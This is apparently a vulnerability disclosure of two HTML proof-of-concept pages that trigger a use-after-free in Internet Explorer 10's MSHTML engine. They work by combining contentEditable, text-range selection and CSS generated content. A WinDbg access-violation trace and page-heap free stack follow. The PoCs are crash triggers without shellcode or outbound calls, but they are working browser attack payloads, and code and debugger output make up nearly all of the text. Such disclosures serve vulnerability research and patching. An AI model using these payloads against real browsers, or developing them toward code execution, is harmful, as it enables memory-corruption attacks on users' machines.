Analyzed with Page Heap Enabled
Win7 32-bit
IE 10


Code:
PoC -1 


<!doctype html>
<html><HEAD>
<title>case148472.html</title>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>
*:nth-child(5)::before {
	content: 'moof';
}
*:nth-child(3) {
	display: inline-block;
}
</style>
</HEAD>
<body><script>
document.body.contentEditable = 'true';
 
elem1 = document.createElement('applet')
elem2 = document.createElement('table')
elem3 = document.createElement('br')
elem4 = document.createElement('q')
elem5 = document.createElement('dialog')
elem6 = document.createElement('s')
elem7 = document.createElement('h6')
elem8 = document.createElement('b')
elem9 = document.createElement('table')


document.body.appendChild(elem1)
elem1.appendChild(elem2)
elem1.appendChild(elem3)
elem2.appendChild(elem4)
elem2.appendChild(elem5)
elem2.appendChild(elem6)
elem2.appendChild(elem7)
elem1.appendChild(elem8)
elem2.appendChild(elem9)
		
rangeTxt = document.body.createTextRange()
startNode = elem8
rangeTxt.moveToElementText(startNode)
rangeTxt.moveEnd('character', '3')
		
try{
	rangeTxt.select()
}
catch(exception){
	document.write(' Bing0! ')
}
		
elem4.parentNode.removeChild(elem4)
				
</script></body></html>


PoC - 2:


<!doctype html>
<html><HEAD><title>case264387.html</title>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>
*:nth-child(5)::before {
	content: 'moof';
}
</style>
</HEAD><body>
<script>


document.body.contentEditable = 'true';
 
elem0 = document.createElement('audio')
elem1 = document.createElement('noscript')
elem2 = document.createElement('center')
elem3 = document.createElement('u')
elem4 = document.createElement('li')
elem5 = document.createElement('dd')
elem6 = document.createElement('rt')
elem7 = document.createElement('noframes')
elem8 = document.createElement('embed')


document.body.appendChild(elem0)
elem0.appendChild(elem1)
elem1.appendChild(elem2)
elem1.appendChild(elem3)
elem1.appendChild(elem4)
elem1.appendChild(elem5)
elem1.appendChild(elem6)
elem1.appendChild(elem7)
elem1.appendChild(elem8)


rangeTxt = document.body.createTextRange()
rangeTxt.select()


function insertAdjacentElement(){
	try{
		elem0.insertAdjacentElement('afterbegin', elem5);
		elem2.insertAdjacentElement('beforeend', elem0);
	}
	catch(exception){
		document.write(' bing0 ')
	}
}
document.addEventListener('DOMContentLoaded', insertAdjacentElement, false)


</script></body></html>
Code:
2:038> g(a68.d98): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=083f8f70 ebx=0500b6a0 ecx=e33f92e2 edx=00020040 esi=0805cfa0 edi=083f8f70
eip=6685a5c0 esp=0500b5a4 ebp=0500b5d0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
MSHTML!CGeneratedContent::Doc:
6685a5c0 f6400a10        test    byte ptr [eax+0Ah],10h     ds:0023:083f8f7a=??




2:038> !heap -p -a eax
    address 083f8f70 found in
    _DPH_HEAP_ROOT @ 1391000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    8372bc8:          83f8000             2000
    6fa190b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    778166ac ntdll!RtlDebugFreeHeap+0x0000002f
    777da13e ntdll!RtlpFreeHeap+0x0000005d
    777a65a6 ntdll!RtlFreeHeap+0x00000142
    7620c484 kernel32!HeapFree+0x00000014
    66d2322b MSHTML!CGeneratedTreeNode::SubRelease+0x00000059
    669c786a MSHTML!CGeneratedTreeNode::Release+0x00000049
    66d428fa MSHTML!CGeneratedContentInfo::ReleaseNodes+0x00000136
    66a0378b MSHTML!CElement::ComputeFormatsVirtual+0x00002641
    66d9149c MSHTML!CElement::ComputeFormats+0x00000208
    6685bb89 MSHTML!CTreeNode::ComputeFormats+0x00000093
    66da64c4 MSHTML!CGeneratedElement::ComputeFormatsVirtual+0x0000009e
    66c4d661 MSHTML!CTreeNode::ComputeFormats+0x0000018d
    6685be6f MSHTML!CTreeNode::ComputeFormatsHelper+0x0000003a
    66aa031b MSHTML!CTreeNode::GetFancyFormat+0x0000003e
    66c4cf6b MSHTML!CTreeNode::CacheStyleForLayout+0x0000002f
    67115271 MSHTML!TextBlock_IsValidInsertionPosition+0x00000048
    6741b2a0 MSHTML!memcpy+0x0013f642
    66a7a2a2 MSHTML!CHTMLEditor::GetSiteContainer+0x0000004e
    66a79bbc MSHTML!CHTMLEditor::AdjustPointer+0x00000293
    66a79901 MSHTML!CEditTracker::AdjustPointerForInsert+0x00000087
    66a7a908 MSHTML!CCaretTracker::PositionCaretAt+0x00000153
    66a7ab4b MSHTML!CCaretTracker::Init2+0x000000ab
    66a792cf MSHTML!CSelectionManager::SetCurrentTracker+0x0000002e
    672997da MSHTML!CSelectionManager::PositionCaret+0x0000003e
    672c82c4 MSHTML!CSelectTracker::BecomePassive+0x0000008d
    672cc32d MSHTML!CSelectTracker::HandleMessagePrivate+0x000001bf
    672cc9de MSHTML!CSelectTracker::HandleEvent+0x00000180
    66d3c2f9 MSHTML!CSelectionManager::HandleEvent+0x0000008b
    66d3c4fd MSHTML!CHTMLEditor::PostHandleEvent+0x0000007d
    66d3c476 MSHTML!CHTMLEditorProxy::PostHandleEvent+0x0000001e
    66a96084 MSHTML!CDoc::HandleSelectionMessage+0x00000124